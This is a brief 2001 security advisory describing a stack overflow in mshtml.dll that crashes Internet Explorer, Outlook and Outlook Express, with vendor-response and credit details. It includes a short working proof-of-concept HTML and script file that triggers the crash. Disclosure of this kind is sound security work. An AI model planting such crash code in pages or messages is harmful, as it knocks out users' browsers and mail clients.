Reported January 15, 2001, by Win2KSecAdvice

VERSIONS AFFECTED
  • Microsoft Internet Explorer 4.0 and later
  • Microsoft Outlook Express
  • Microsoft Outlook

DESCRIPTION

A low-risk stack overflow has been discovered in the .dll file responsible for parsing HTML. Any program that uses mshtml.dll, such as Internet Explorer (IE), Outlook, and Outlook Express, is vulnerable. This vulnerability is low risk because the overflow does not let intruders launch arbitrary commands; it simply crashes the affected program.

DEMONSTRATION

The following code was provided by Thor Larholm:


------------InstantCrash.html-----------------

<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>

----------------------------------------------

VENDOR RESPONSE

Microsoft was notified on December 4, 2000. According to Thor Larholm, Microsoft will address this bug in the next service pack for IE.

CREDIT

Discovered by Thor Larholm.